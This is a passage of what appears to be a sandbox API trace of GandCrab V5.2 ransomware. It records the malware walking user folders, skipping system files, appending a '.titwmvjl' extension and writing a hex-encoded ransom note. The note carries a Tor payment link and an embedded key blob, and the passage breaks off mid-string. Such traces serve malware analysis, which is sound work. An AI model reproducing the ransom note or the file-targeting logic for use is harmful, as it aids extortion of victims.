[0069.498] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0069.498] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0069.498] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0069.498] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0069.498] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0069.498] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0069.498] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0069.498] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.499] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 0 [0069.499] FindClose (in: hFindFile=0x503638 | out: hFindFile=0x503638) returned 1 [0069.499] CloseHandle (hObject=0x2c4) returned 1 [0069.500] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0069.500] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0069.500] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0069.500] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\TITWMVJL-DECRYPT.txt" [0069.500] lstrlenW (lpString=".titwmvjl") returned 9 [0069.500] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\TITWMVJL-DECRYPT.txt") returned 72 [0069.500] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.500] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 81 [0069.500] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\TITWMVJL-DECRYPT.txt") returned 72 [0069.500] lstrlenW (lpString=".txt") returned 4 [0069.500] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.500] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0069.500] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0069.500] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.500] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\TITWMVJL-DECRYPT.txt") returned 72 [0069.500] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\TITWMVJL-DECRYPT.txt") returned 72 [0069.500] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0069.500] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0069.500] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0069.501] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0069.501] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0069.501] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0069.501] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0069.501] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0069.501] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.501] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 0 [0069.501] FindClose (in: hFindFile=0x5036f8 | out: hFindFile=0x5036f8) returned 1 [0069.502] CloseHandle (hObject=0x2bc) returned 1 [0069.502] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0069.502] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0069.502] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0069.502] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\d2ca4a09d2ca4deb61a.lock" [0069.502] lstrlenW (lpString=".titwmvjl") returned 9 [0069.502] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\d2ca4a09d2ca4deb61a.lock") returned 68 [0069.502] VirtualAlloc (lpAddress=0x0, dwSize=0xc8, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.502] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 77 [0069.502] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\d2ca4a09d2ca4deb61a.lock") returned 68 [0069.502] lstrlenW (lpString=".lock") returned 5 [0069.502] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.502] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0069.502] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.503] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.503] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0069.503] lstrcmpW (lpString1="Flash Player", lpString2=".") returned 1 [0069.503] lstrcmpW (lpString1="Flash Player", lpString2="..") returned 1 [0069.503] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\", lpString2="Flash Player" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player" [0069.503] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\" [0069.503] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0069.503] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.503] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0069.504] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.504] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0069.504] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.504] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0069.504] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.504] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0069.504] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.504] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.504] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\\\TITWMVJL-DECRYPT.txt") returned 78 [0069.504] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\flash player\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0069.506] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\